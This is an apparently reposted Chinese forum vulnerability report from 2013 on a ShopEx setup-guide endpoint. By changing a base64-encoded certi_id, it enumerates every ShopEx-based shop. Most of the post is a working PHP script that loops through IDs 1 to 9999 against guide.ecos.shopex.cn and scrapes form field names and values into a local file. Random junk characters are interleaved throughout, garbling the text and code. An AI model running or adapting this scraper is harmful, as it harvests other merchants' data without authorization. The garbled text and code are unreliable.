|
|
简要描述:
' j0 G J, w- j! u2 P. Y+ lShopEx某接口缺陷,可遍历所有网站
0 D* u1 {. v' _2 c8 b详细说明:
( v X2 `7 X6 I问题出现在shopex 网店使用向导页面
# u+ M1 r, `' C4 H
1 F3 @6 G/ @9 q$ L; t: l J8 F) i& W: G" ^
$ b% h! `1 R9 D" v$ F
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
; x+ y* [1 |3 ^, d6 l; x5 U
) f2 X9 X% I2 a! j! F" ]& G' l+ ~1 ~" T2 `/ ^
k7 I) N2 @1 B6 |refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
9 i5 E- I5 g" E* e: x. r( z
7 n( l4 k' q: C2 }
1 W7 `2 s9 z% o1 f0 {' E% v
% M5 J7 V9 r0 g. O9 `我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 3 u0 {3 S+ v8 B, S! b
" e1 F' Y! f$ p3 k: K/ `7 l( l
. M9 d$ E. j$ h! y) [4 D2 i. o; o5 S2 }9 M
<?php
8 c9 I/ V8 ]; ~6 T
: T/ }' b: S( c4 v) @ for ($i=1; $i < 10000; $i++) { //遍历* o5 y6 X: K( R: Z5 v2 Q% R" h4 x* L! [% [
" h: e6 e; N8 a( m! p) B% h
ShowshopExD($i);" l& y& ^& Q$ i. }8 `. u0 e
( u! w' x6 d& `7 W, M5 U- ?* Z
}
. B8 O" u# m$ n- J3 v- t; S8 d* [% b3 f
function ShowshopExD($cid) {/ R: D8 |/ R) N5 q8 B# d% m/ P+ v3 K
5 p# ], x& }" v6 O $url='http://guide.ecos.shopex.cn/step2.php';
- F8 @+ w- Z' t+ ?
" B! x$ ?; r0 P' X0 h* I $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
: ]& R& X+ v( S- q6 j1 m; \5 }! c0 _4 u- l9 O$ }4 \1 h+ x
$url = $url.'?refer='.$refer;; }' [1 P! n4 N6 u9 `) B* x
' r4 V z. m4 C $ch = curl_init($url);
4 W2 a% H" e( l7 T Z; C3 T( v5 n2 \% }. L
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;7 U; A; f& x! |/ h
' a; _2 E5 N6 ]+ J7 M p curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
$ T! g% j# k$ C4 o9 ^; v" w$ q6 K5 L: U3 Q8 f# k. X0 k
$result = curl_exec($ch);
8 ]: X3 H8 W( V7 K' d; B) _: k
$ k6 d5 m# I) Q4 U $result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 q# m6 _; F% j5 [7 b. @2 n0 F$ [' }0 z5 m# g7 y' O
if(strpos($result,$refer))
/ h l8 f) {- ~ V+ N
" K8 V3 q$ p& D; J; t# W: c { n* t& A0 P) C1 U. p# s
# @, f$ i" y* g $fp = fopen("c:/shopEx.txt",'ab'); //保存文件6 `7 F& I( J1 D
& D, R& p, |! j) |, L; s preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
5 m5 n- n' I! t; q8 |9 @+ d7 ?6 J. I6 c% f" Q# o" X1 p
foreach ($value[1] as $key) {1 `1 u/ B8 N8 j, t
1 U% U# ^: g5 Y) \0 E" P1 j: m) w preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);) f' j) S4 J* a4 @
* S) K1 q6 r) V0 C, E' O9 I" z5 k
echo $res[1][0].':'.$res[3][0]."\r\n";
0 B: e' Z2 [3 t: q( U2 k; K5 J
1 ^. ?- _9 q/ }! e& i1 U6 F: ` $col =$res[1][0].':'.$res[3][0]."\r\n";
1 t5 T* o" e! d8 U! N& V* W0 u. C
* h2 @+ B3 h( c. q9 q; c fwrite($fp, $col, strlen($col));
" X# O2 m9 R- W; ~6 v5 ~: u4 v. ]& v6 ^
}5 q) @& f0 u% P6 m2 ]
$ |1 u: D) o4 m: G' R" H echo '--------------------------------'."\r\n";
" M9 ^# Z; F) T G- k/ \: p8 [! s \5 b% W9 E8 A; E$ m0 ^
fclose($fp);
+ E7 f6 W: g, v2 F7 I; w
8 b8 I0 }' i, H! p }# N) `7 N& M; N9 y3 J
/ A2 Q k% |; p6 I: s- X
flush();
/ B/ s7 J8 n( ~9 G. D/ T: ^, o6 l* R# R ]+ A4 b1 S% u9 `" s
curl_close($ch);
6 w7 d. n2 F* b9 @
7 L8 _% }/ B6 M; y) ]4 |7 V+ D* z }
: e* w/ \( h7 \2 k
# ~- S) z `+ g2 k" H6 Q. }?>: k$ h8 b. X# M8 w
漏洞证明:3 d2 E' S8 d; x0 J
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg# n, H& ?9 y: d6 b
refer换成其他加密方式
2 i7 a' ^ U% ]" h9 f5 i |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对